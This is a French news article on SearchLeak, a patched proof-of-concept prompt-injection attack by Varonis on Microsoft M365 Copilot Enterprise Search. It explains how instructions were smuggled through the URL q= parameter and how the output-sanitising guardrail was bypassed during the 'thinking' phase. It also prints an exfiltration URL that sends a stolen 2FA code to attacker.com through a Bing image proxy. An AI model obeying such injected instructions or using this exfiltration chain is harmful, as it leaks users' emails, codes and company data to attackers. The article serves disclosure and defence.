Bien qu’elle ne soit pas la première du genre, l’attaque POC menée par des chercheurs contre le M365 Copilot Enterprise de Microsoft souligne que les injections de paramètres à invite (P2P) constituent une menace potentiellement importante.
Une récente attaque de validation de principe contre M365 Copilot Enterprise de Microsoft met en évidence ce qui pourrait être une menace d’injection rapide beaucoup plus large basée sur un mode de fonctionnement commun de nombreux services Web améliorés par l’IA.
Baptisée SearchLeak, l’attaque reposait sur un objectif malveillant typique : divulguer des données sensibles de l’entreprise en incitant les employés à cliquer sur des liens spécialement conçus.
Pour mener à bien l’attaque, les chercheurs ont combiné trois faiblesses dans la mise en œuvre de Copilot Enterprise Search, dont l’une se révèle également comme un problème potentiel dans d’autres applications basées sur l’IA. Microsoft, qui a qualifié la faille de divulgation d’informations de critique, a corrigé la vulnérabilité côté serveur plus tôt ce mois-ci, mais l’attaque montre également les implications du fait que les services basés sur l’IA ont un large accès aux actifs de l’entreprise pour le compte de leurs utilisateurs.
« Puisque SearchLeak cible le niveau Entreprise de Microsoft, le rayon d’action ne se limite pas aux données personnelles : il est capable de faire apparaître tout ce à quoi l’utilisateur a accès au sein de l’organisation, y compris les e-mails, les invitations et notes de réunion, les documents SharePoint, les fichiers OneDrive et autres contenus professionnels indexés », ont déclaré les chercheurs de Varonis Threat Labs dans leur rapport. « En fonction de la manière dont le M365 est connecté à l’environnement, le rayon d’explosion pourrait s’étendre encore plus. »
Injection de paramètre à invite
Ce qui rend l’attaque possible, c’est la façon dont fonctionne Microsoft Copilot Enterprise Search.
Comme c’est souvent le cas pour les fonctionnalités de recherche dans de nombreuses applications Web, Copilot Search s’appuie sur des URL contenant un ?q=(query) paramètre. Mais comme Copilot Search est alimenté par l’IA, le paramètre de requête accepte les invites en langage naturel, et pas seulement les requêtes de recherche simples.
« Transformer un paramètre d’URL en une instruction d’IA qui exfiltre silencieusement les données ? C’est l’élément natif de l’IA », ont déclaré les chercheurs. « C’est la nouvelle surface d’attaque qui rend les bogues classiques exploitables d’une manière qui ne le serait pas autrement, ce dont nous avons maintenant été témoins avec SearchLeak et Reprompt. »
Reprompt est une attaque similaire que les chercheurs de Varonis ont découverte dans Microsoft Copilot Personal et révélée cette semaine. Mais il existe d’autres précédents pour ce que Varonis a surnommé l’injection de paramètre à invite (P2P). En octobre dernier, des chercheurs de LayerX ont révélé une vulnérabilité d’injection rapide dans le navigateur Comet de Perplexity qui reposait également sur des instructions de fuite de données transmises à un moteur de recherche alimenté par l’IA via le paramètre q= dans les URL.
Encore plus tôt, en juillet 2025, des chercheurs de Tenable ont révélé une vulnérabilité dans ChatGPT qui utilisait également des URL malveillantes. Les paramètres de requête d’URL devenant un moyen courant de permettre une exécution rapide à la volée dans les applications basées sur l’IA, ce vecteur d’attaque pourrait devenir plus couramment exploité à l’avenir.
Extraire les données
Demander à un LLM d’exécuter des invites malveillantes pour accéder aux données d’une entreprise n’est qu’une partie d’une attaque réussie. L’autre nécessite de trouver des moyens d’extraire ces données vers un serveur externe, car le simple fait de tromper le service Web pour qu’il présente les données à la victime dans son navigateur ne pose intrinsèquement aucun risque de sécurité. L’utilisateur peut déjà rechercher et accéder à ces données.
Une technique d’exfiltration courante dans les attaques par injection rapide consiste à abuser de la capacité d’une application Web basée sur l’IA à afficher des réponses au format HTML, étant donné que HTML peut inclure des éléments qui nécessitent que le navigateur envoie des requêtes à des ressources distantes, telles que <img> balises. En abusant de ces balises, les attaquants peuvent forcer la fuite des données via les requêtes du navigateur vers un serveur sous leur contrôle.
Dans le cas de Copilot Enterprise Search, Microsoft avait mis en place un garde-fou qui enfermait les réponses de recherche du LLM à l’intérieur <code> blocs, le présentant au navigateur sous forme de texte. Les chercheurs de Varonis ont cependant découvert que cette enveloppe ne s’appliquait qu’après que le modèle ait terminé sa phase de réflexion. Le processus de réflexion lui-même était toujours rendu au format HTML dans le navigateur de l’utilisateur.
« Il s’agit d’une condition de concurrence théorique », ont déclaré les chercheurs. « Le garde-corps est une étape de post-traitement appliquée à la sortie finale, mais le navigateur n’attend pas la « finale » : il s’affiche de manière incrémentielle. Au moment où le désinfectant s’active, le mal est fait.
Microsoft disposait d’un deuxième garde-fou, la politique de sécurité du contenu (CSP), qui permet aux propriétaires de sites Web de définir quels domaines externes peuvent charger des ressources dans la page. Dans ce cas, le CSP pour m365.cloud.microsoft.com a également autorisé les ressources de *.bing.comle moteur de recherche de Microsoft.
Il s’avère que la recherche d’images de Bing prend en charge un imgurl= Paramètre URL pour récupérer des images à partir de serveurs externes. En conséquence, les chercheurs pourraient utiliser la recherche d’images de Bing comme proxy pour divulguer les données.
La chaîne d’attaque de preuve de concept développée par Varonis a montré comment le code d’authentification à deux facteurs d’un utilisateur envoyé par courrier électronique pouvait être divulgué. Premièrement, ils créeraient un lien vers Copilot Enterprise Search qui demanderait au service de rechercher dans la boîte aux lettres de l’utilisateur un e-mail contenant le code, puis de stocker ce code dans une variable et de formuler une réponse comprenant un <img> avec la source étant https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/$variable/img.png.
« Étant donné que Copilot Enterprise fonctionne avec toutes les autorisations graphiques de l’utilisateur, l’attaquant hérite effectivement de l’accès de la victime aux données de l’organisation, sans jamais s’authentifier », ont découvert les chercheurs. « Cela permet le piratage de compte et des scénarios plus larges de vol de données à l’insu de la victime. Aucun privilège spécial n’est nécessaire du côté de l’attaquant, juste une URL spécialement conçue et un simple clic de la part de la victime. »
Atténuer les implications plus larges
Ce que montrent ces attaques POC, c’est que les développeurs d’applications et de services Web basés sur l’IA doivent filtrer le type d’invites autorisées via les paramètres de requête d’URL et nettoyer la sortie au moment du rendu, et non comme une étape de post-traitement. Les politiques CSP doivent également être examinées pour détecter les risques potentiels de falsification de requêtes côté serveur (SSRF) via les domaines sur liste blanche.
Les organisations qui utilisent de tels services devraient former leurs employés à se méfier des liens comportant des paramètres de requête longs, surtout s’ils sont codés. Les équipes de sécurité doivent détecter et bloquer les requêtes vers des URL contenant des balises HTML ou des instructions pour intégrer des données dans ces balises.
